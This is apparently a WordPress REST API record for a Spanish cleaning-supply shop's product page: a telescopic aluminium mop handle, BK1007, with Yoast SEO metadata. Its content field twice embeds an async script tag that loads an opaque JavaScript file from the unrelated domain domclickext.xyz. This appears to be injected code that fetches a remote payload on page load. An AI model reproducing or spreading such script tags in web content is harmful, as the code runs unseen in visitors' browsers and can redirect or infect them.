{"id":6127,"date":"2019-08-16T12:21:06","date_gmt":"2019-08-16T11:21:06","guid":{"rendered":"http:\/\/www.meprolim.es\/?post_type=product&#038;p=6127"},"modified":"2019-10-30T10:13:44","modified_gmt":"2019-10-30T10:13:44","slug":"mango-aluminio-telescopico-115-186-cms","status":"publish","type":"product","link":"https:\/\/meprolim.es\/en\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual-en\/sistemas-fregado-en\/mopas-planas-en\/mango-aluminio-telescopico-115-186-cms\/","title":{"rendered":"MANGO ALUMINIO TELESC\u00d3PICO 115-186 CMS. &#8211; C\u00d3DIGO: BK1007"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_column_text]<\/p>\n<p>Tubo fijo con doblez telesc\u00f3pico &#8211; de 115 a 186 cm. &#8211; Fregado manual con mopa plana.<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>\u2022 Fabricados en fibra de vidrio y aluminio no magn\u00e9tico, se pueden usar en salas de resonancia magn\u00e9tica.<\/p>\n<p>\u2022 Asa con agarre para mayor comodidad del operario.<\/p>\n<p><strong>SKU: BK1007<\/strong><\/p>\n","protected":false},"featured_media":10767,"template":"","meta":{"rs_blank_template":"","rs_page_bg_color":"","slide_template_v7":""},"product_brand":[],"product_cat":[102,1087,949,324,955,948,1085],"product_tag":[325,339],"class_list":["post-6127","product","type-product","status-publish","has-post-thumbnail","product_cat-carros-de-servicio-fregado-manual-y-articulos-de-limpieza","product_cat-extensible","product_cat-flexy-frame-rubbermaid","product_cat-fregado-manual","product_cat-mangos","product_cat-mopas-planas","product_cat-sistemas-fregado","product_tag-fregado-manual","product_tag-mango-mopa","first","instock","shipping-taxable","product-type-simple"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>MANGO ALUMINIO TELESC\u00d3PICO 115-186 CMS. - C\u00d3DIGO: BK1007 - Meprolim<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/mopas-planas\/mango-aluminio-telescopico-115-186-cms\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"MANGO ALUMINIO TELESC\u00d3PICO 115-186 CMS. - C\u00d3DIGO: BK1007 - Meprolim\" \/>\n<meta property=\"og:description\" content=\"\u2022 Fabricados en fibra de vidrio y aluminio no magn\u00e9tico, se pueden usar en salas de resonancia magn\u00e9tica. \u2022 Asa con agarre para mayor comodidad del operario. SKU: BK1007\" \/>\n<meta property=\"og:url\" content=\"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/mopas-planas\/mango-aluminio-telescopico-115-186-cms\/\" \/>\n<meta property=\"og:site_name\" content=\"Meprolim\" \/>\n<meta property=\"article:modified_time\" content=\"2019-10-30T10:13:44+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/BK1007.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"768\" \/>\n\t<meta property=\"og:image:height\" content=\"773\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/mopas-planas\\\/mango-aluminio-telescopico-115-186-cms\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/mopas-planas\\\/mango-aluminio-telescopico-115-186-cms\\\/\",\"name\":\"MANGO ALUMINIO TELESC\u00d3PICO 115-186 CMS. - C\u00d3DIGO: BK1007 - Meprolim\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/mopas-planas\\\/mango-aluminio-telescopico-115-186-cms\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/mopas-planas\\\/mango-aluminio-telescopico-115-186-cms\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/08\\\/BK1007.jpg\",\"datePublished\":\"2019-08-16T11:21:06+00:00\",\"dateModified\":\"2019-10-30T10:13:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/mopas-planas\\\/mango-aluminio-telescopico-115-186-cms\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/mopas-planas\\\/mango-aluminio-telescopico-115-186-cms\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/mopas-planas\\\/mango-aluminio-telescopico-115-186-cms\\\/#primaryimage\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/08\\\/BK1007.jpg\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/08\\\/BK1007.jpg\",\"width\":768,\"height\":773},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/fregado-manual\\\/sistemas-fregado\\\/mopas-planas\\\/mango-aluminio-telescopico-115-186-cms\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/meprolim.es\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Catalogue\",\"item\":\"https:\\\/\\\/meprolim.es\\\/en\\\/catalogue\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"MANGO ALUMINIO TELESC\u00d3PICO 115-186 CMS. &#8211; C\u00d3DIGO: BK1007\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"name\":\"Meprolim\",\"description\":\"Cavas Catalanas S.L.\",\"publisher\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\",\"name\":\"Meprolim\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"width\":401,\"height\":162,\"caption\":\"Meprolim\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"MANGO ALUMINIO TELESC\u00d3PICO 115-186 CMS. - C\u00d3DIGO: BK1007 - Meprolim","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/mopas-planas\/mango-aluminio-telescopico-115-186-cms\/","og_locale":"en_US","og_type":"article","og_title":"MANGO ALUMINIO TELESC\u00d3PICO 115-186 CMS. - C\u00d3DIGO: BK1007 - Meprolim","og_description":"\u2022 Fabricados en fibra de vidrio y aluminio no magn\u00e9tico, se pueden usar en salas de resonancia magn\u00e9tica. \u2022 Asa con agarre para mayor comodidad del operario. SKU: BK1007","og_url":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/mopas-planas\/mango-aluminio-telescopico-115-186-cms\/","og_site_name":"Meprolim","article_modified_time":"2019-10-30T10:13:44+00:00","og_image":[{"width":768,"height":773,"url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/BK1007.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/mopas-planas\/mango-aluminio-telescopico-115-186-cms\/","url":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/mopas-planas\/mango-aluminio-telescopico-115-186-cms\/","name":"MANGO ALUMINIO TELESC\u00d3PICO 115-186 CMS. - C\u00d3DIGO: BK1007 - Meprolim","isPartOf":{"@id":"https:\/\/meprolim.es\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/mopas-planas\/mango-aluminio-telescopico-115-186-cms\/#primaryimage"},"image":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/mopas-planas\/mango-aluminio-telescopico-115-186-cms\/#primaryimage"},"thumbnailUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/BK1007.jpg","datePublished":"2019-08-16T11:21:06+00:00","dateModified":"2019-10-30T10:13:44+00:00","breadcrumb":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/mopas-planas\/mango-aluminio-telescopico-115-186-cms\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/mopas-planas\/mango-aluminio-telescopico-115-186-cms\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/mopas-planas\/mango-aluminio-telescopico-115-186-cms\/#primaryimage","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/BK1007.jpg","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/BK1007.jpg","width":768,"height":773},{"@type":"BreadcrumbList","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/fregado-manual\/sistemas-fregado\/mopas-planas\/mango-aluminio-telescopico-115-186-cms\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/meprolim.es\/en\/"},{"@type":"ListItem","position":2,"name":"Catalogue","item":"https:\/\/meprolim.es\/en\/catalogue\/"},{"@type":"ListItem","position":3,"name":"MANGO ALUMINIO TELESC\u00d3PICO 115-186 CMS. &#8211; C\u00d3DIGO: BK1007"}]},{"@type":"WebSite","@id":"https:\/\/meprolim.es\/fr\/#website","url":"https:\/\/meprolim.es\/fr\/","name":"Meprolim","description":"Cavas Catalanas S.L.","publisher":{"@id":"https:\/\/meprolim.es\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/meprolim.es\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/meprolim.es\/fr\/#organization","name":"Meprolim","url":"https:\/\/meprolim.es\/fr\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","width":401,"height":162,"caption":"Meprolim"},"image":{"@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product\/6127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/media\/10767"}],"wp:attachment":[{"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/media?parent=6127"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product_brand?post=6127"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product_cat?post=6127"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meprolim.es\/en\/wp-json\/wp\/v2\/product_tag?post=6127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}